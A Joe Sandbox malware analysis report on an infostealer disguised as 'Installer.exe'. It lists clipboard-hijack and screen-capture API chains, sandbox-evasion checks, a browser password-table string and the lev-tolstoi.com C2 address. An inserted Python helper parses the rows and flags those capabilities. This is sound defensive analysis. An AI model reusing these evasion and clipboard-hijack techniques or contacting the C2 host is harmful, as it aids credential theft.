Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_04FE1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber, 3_2_04FE1000
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00433600 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 3_2_00433600
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00433B7A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 3_2_00433B7A
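The rows above carry three kinds of evidence that are easier to triage when parsed than when read: URL strings with the memory regions they were found in (the lev-tolstoi.com variants such as /api#4, /apim and /apix:Z are the same string over-read past its terminator), the TLS peers behind the port-443 connections, and the Windows API call chains of the clipboard and screen-capture functions at 3_2_04FE1000 and 3_2_00433B7A. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It assumes the rows have been normalised to a "Source: ... | detail" layout; the sample rows are copies of eight rows from this report, and the capability API sets, the "clipper" rule and the function names are the example's own choices.

```python
"""Triage helpers for the flattened 'Source: ... | detail' rows of a Joe Sandbox report.

Three row kinds are handled: strings (URLs) found in memory dumps, HTTPS
connections, and code-function rows that list the Windows APIs a function calls.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Constructed sample: eight rows copied from the report, column separator normalised to ' | '.
SAMPLE_ROWS = [
    r"Source: Installer.exe, 00000003.00000003.1715238902.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738791438.00000000035B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/",
    r"Source: Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1857732899.00000000035B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api",
    r"Source: Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api#4",
    r"Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2",
    r"Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2",
    r"Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2",
    r"Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_04FE1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber, 3_2_04FE1000",
    r"Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00433B7A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 3_2_00433B7A",
]

_ROW_RE = re.compile(r"^Source: (?P<source>.*?) \| (?P<kind>[^:]+): (?P<detail>.*)$")
_DUMP_RE = re.compile(r"\S+\.sdmp")
# Function rows end with the function's own address repeated (the name column), fused or space-separated.
_FUNC_RE = re.compile(r"^(?P<addr>\d+_\d+_[0-9A-Fa-f]+) (?P<apis>.*?),?\s*(?P=addr)$")
_TLS_RE = re.compile(r"^(?P<ip>\d+(?:\.\d+){3}):\d+ -> ")

# Example API combinations (an assumption of this example): all members must appear in the call list.
CAPABILITY_SIGNATURES = {
    "clipboard_read": {"OpenClipboard", "GetClipboardData"},
    "clipboard_write": {"EmptyClipboard", "SetClipboardData"},
    "screen_capture": {"GetDC", "CreateCompatibleBitmap", "BitBlt"},
}


def parse_rows(rows):
    """Yield (source, kind, detail) for every row that matches the report layout."""
    for row in rows:
        m = _ROW_RE.match(row.strip())
        if m:
            yield m.group("source"), m.group("kind"), m.group("detail")


def url_hosts_by_dump(rows):
    """Map each URL host to the set of memory regions it was found in.

    Grouping by host folds over-read variants such as /api#4 or /apim into one entry.
    Strings found only in the file image (no .sdmp source) get a placeholder region.
    """
    hosts = defaultdict(set)
    for source, kind, detail in parse_rows(rows):
        if kind != "String found in binary or memory":
            continue
        host = urlsplit(detail.split()[0]).hostname
        if not host:
            continue
        hosts[host].update(_DUMP_RE.findall(source) or ["<file image>"])
    return hosts


def rank_hosts(rows):
    """Hosts ordered by the number of distinct memory regions that reference them.

    A URL the sample keeps in its working buffers surfaces in many regions; URLs
    lifted from harvested browser profiles cluster in the few regions holding that data.
    """
    hosts = url_hosts_by_dump(rows)
    return sorted(((h, len(d)) for h, d in hosts.items()), key=lambda x: (-x[1], x[0]))


def tls_peers(rows):
    """Count TLS connections per remote IP from 'HTTPS traffic detected' rows."""
    peers = Counter()
    for _, kind, detail in parse_rows(rows):
        if kind == "HTTPS traffic detected":
            m = _TLS_RE.match(detail)
            if m:
                peers[m.group("ip")] += 1
    return dict(peers)


def classify_functions(rows):
    """Tag each 'Code function' row with the capabilities its API list implies."""
    tags = {}
    for _, kind, detail in parse_rows(rows):
        if kind != "Code function":
            continue
        m = _FUNC_RE.match(detail)
        if not m:
            continue
        apis = {a for a in m.group("apis").split(",") if a}
        found = {name for name, needed in CAPABILITY_SIGNATURES.items() if needed <= apis}
        # Read and replace gated on GetClipboardSequenceNumber is the clipboard-hijack loop.
        if {"clipboard_read", "clipboard_write"} <= found and "GetClipboardSequenceNumber" in apis:
            found.add("clipper")
        tags[m.group("addr")] = sorted(found)
    return tags


if __name__ == "__main__":
    for host, n in rank_hosts(SAMPLE_ROWS):
        print(f"{n:3d} regions  {host}")
    print(tls_peers(SAMPLE_ROWS))
    print(classify_functions(SAMPLE_ROWS))
```

Run against the full row set, the ranking puts lev-tolstoi.com well ahead of the Steam, Mozilla and search-engine hosts, which is the expected shape for a stealer that keeps its C2 in memory while the other URLs come from harvested browser data; on the sample rows the host counts 4 regions against 2 for steamcommunity.com. The function classifier flags 3_2_04FE1000 as a clipboard read-and-write loop and 3_2_00433B7A as a screen capture, which is a quicker check than reading the API chains by eye.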
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00341000 0_2_00341000
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034F555 0_2_0034F555
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00367792 0_2_00367792
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00365C5E 0_2_00365C5E
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00359CC0 0_2_00359CC0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00353FB2 0_2_00353FB2
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00341000 2_2_00341000
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_0034F555 2_2_0034F555
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00367792 2_2_00367792
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00365C5E 2_2_00365C5E
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00359CC0 2_2_00359CC0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00353FB2 2_2_00353FB2
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00412100 3_2_00412100
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0042C9D4 3_2_0042C9D4
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00410A57 3_2_00410A57
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00415200 3_2_00415200
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00409370 3_2_00409370
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00426B70 3_2_00426B70
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00421B10 3_2_00421B10
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0043CB20 3_2_0043CB20
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00423D40 3_2_00423D40
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0040CD4E 3_2_0040CD4E
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0040ADEC 3_2_0040ADEC
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004085F0 3_2_004085F0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00440E00 3_2_00440E00
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00422E3F 3_2_00422E3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004396A0 3_2_004396A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00441700 3_2_00441700
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0040D7CF 3_2_0040D7CF
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00408800 3_2_00408800
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041780D 3_2_0041780D
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004410D0 3_2_004410D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0042788F 3_2_0042788F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00403900 3_2_00403900
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041C900 3_2_0041C900
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0043A120 3_2_0043A120
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00405930 3_2_00405930
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0043D1C0 3_2_0043D1C0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004081D0 3_2_004081D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0043A9D6 3_2_0043A9D6
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004259E4 3_2_004259E4
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00433180 3_2_00433180
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00424990 3_2_00424990
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00406240 3_2_00406240
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00431210 3_2_00431210
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041E220 3_2_0041E220
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00427A3F 3_2_00427A3F
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004042B0 3_2_004042B0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004402B0 3_2_004402B0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041DB40 3_2_0041DB40
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00422370 3_2_00422370
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00408B00 3_2_00408B00
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00424B00 3_2_00424B00
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00428307 3_2_00428307
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004403D0 3_2_004403D0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004413E0 3_2_004413E0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00404BF0 3_2_00404BF0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041AB80 3_2_0041AB80
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00438C5D 3_2_00438C5D
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00416C77 3_2_00416C77
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00437C78 3_2_00437C78
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0042AC30 3_2_0042AC30
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0042F4F6 3_2_0042F4F6
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00419C90 3_2_00419C90
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00416492 3_2_00416492
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0042CCA2 3_2_0042CCA2
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004074A0 3_2_004074A0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004264B0 3_2_004264B0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00438CB0 3_2_00438CB0
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041E540 3_2_0041E540
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00440550 3_2_00440550
Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0041C561 3_2_0041C561
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042D57F3_2_0042D57F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004385C73_2_004385C7
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00411DC93_2_00411DC9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00418DE63_2_00418DE6
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004115F13_2_004115F1
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004205833_2_00420583
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0042E64D3_2_0042E64D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041966B3_2_0041966B
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004406003_2_00440600
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041DE103_2_0041DE10
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00417E1A3_2_00417E1A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00402EC03_2_00402EC0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004066D03_2_004066D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00426ED03_2_00426ED0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004406903_2_00440690
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004146A03_2_004146A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00426EB03_2_00426EB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004297403_2_00429740
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040A7703_2_0040A770
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004287703_2_00428770
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00438F103_2_00438F10
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043D7103_2_0043D710
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00415F193_2_00415F19
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00436F2C3_2_00436F2C
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043A7D03_2_0043A7D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004227E03_2_004227E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00416FF03_2_00416FF0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0040C7823_2_0040C782
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043AF803_2_0043AF80
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00408F903_2_00408F90
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004167903_2_00416790
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_004307973_2_00430797
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0041E7A03_2_0041E7A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_0043F7B23_2_0043F7B2
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0035CFD6 appears 40 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0034FAE4 appears 34 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 003580F8 appears 42 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00350730 appears 38 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00407FE0 appears 41 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 00414690 appears 95 times
                Source: C:\Users\user\Desktop\Installer.exeCode function: String function: 0034FA60 appears 100 times
                Source: Installer.exe | Static PE information: invalid certificate
                Source: Installer.exe, 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000002.00000000.1672072820.00000000003CF000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000003.00000002.3522502957.00000000003CF000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe, 00000003.00000003.1672972885.00000000035EA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe | Binary or memory string: OriginalFilenameMuiUnattend.exej% vs Installer.exe
                Source: Installer.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Installer.exe | Static PE information: Section: .bss ZLIB complexity 1.0003360896915585
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/1@11/2
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004396A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                Source: Installer.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Installer.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Installer.exe, 00000003.00000003.1785946672.0000000005C4E000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1786173640.0000000005C51000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1785844021.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Installer.exe | ReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\Installer.exe | File read: C:\Users\user\Desktop\Installer.exe
                Source: unknown | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: acgenral.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: samcli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: msacm32.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: dwmapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmmbase.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmmbase.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: aclayers.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sfc.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: acgenral.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: samcli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: msacm32.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: dwmapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmmbase.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winmmbase.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: aclayers.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sfc.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\Installer.exe | Section loaded: ondemandconnroutehelper.dll
                Source: Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Installer.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Installer.exe | Static PE information: real checksum: 0x97cc3 should be: 0x933b3
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034FB83 push ecx; ret 0_2_0034FB96
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_0034FB83 push ecx; ret 2_2_0034FB96
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00440240 push eax; mov dword ptr [esp], DED9D88Bh 3_2_00440245
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_004464FA push edx; ret 3_2_00446500
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0044666E push cs; ret 3_2_00446682
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00446627 push cs; ret 3_2_00446682
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_00430797 push 89240489h; mov dword ptr [esp], eax 3_2_004307CB
                Source: C:\Users\user\Desktop\Installer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\Installer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Installer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Installer.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\Installer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Installer.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\Installer.exe | Window / User API: threadDelayed 9974
                Source: C:\Users\user\Desktop\Installer.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-20104
                Source: C:\Users\user\Desktop\Installer.exe TID: 7508 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\Installer.exe TID: 7864 | Thread sleep count: 9974 > 30
                Source: C:\Users\user\Desktop\Installer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Installer.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Installer.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00361F38 FindFirstFileExW
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00361FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose
